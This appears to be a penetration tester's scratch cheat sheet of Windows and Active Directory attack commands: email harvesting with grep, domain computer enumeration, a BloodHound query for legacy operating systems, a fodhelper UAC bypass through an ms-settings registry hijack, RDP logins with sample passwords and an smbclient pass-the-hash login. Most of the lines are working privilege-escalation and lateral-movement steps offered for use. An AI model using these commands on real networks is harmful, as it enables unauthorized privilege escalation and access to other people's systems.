grep -E -o "\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,6}\b" foo.txt
https://sid-500.com/2019/07/30/powershell-retrieve-list-of-domain-computers-by-operating-system/
Get-ADComputer -Filter 'enabled -eq "true"' `
-Properties Name,Operatingsystem,OperatingSystemVersion,IPv4Address |
Sort-Object -Property Operatingsystem |
Select-Object -Property Name,Operatingsystem,OperatingSystemVersion,IPv4Address
MATCH (H:Computer) WHERE H.operatingsystem =~ '(?i).*(2000|2003|2008|xp|vista|me).*' RETURN H
New-Item -Path HKCU:\Software\Classes\ms-settings\shell\open\command -Value cmd.exe -Force
New-ItemProperty -Path HKCU:\Software\Classes\ms-settings\shell\open\command -Name DelegateExecute -PropertyType String -Force
cmd -> fodhelper
DomainA --direction of access--> DomainB
<--Direction of trust--
"If you trust me, you can access resources from me"\
rdesktop -d dt.com -u user1 -p Pa$$w0rd 10.10.10.10 -g 100%
xfreerdp +clipboard /d:test.com /u:test /p:Pa$$w0rd /v:10.10.10.10 /size:100%
xfreerdp +nego +sec-rdp +sec-tls +sec-nla /d: /u: /p: /v:10.10.10.10 /u:administrator /p:password /size:100%
smbclient //x.x.x.x/c$ -W domain.com -U admin%nthash —pw-nt-hash
https://gist.github.com/seajaysec/c7f0995b5a6a2d30515accde8513f77d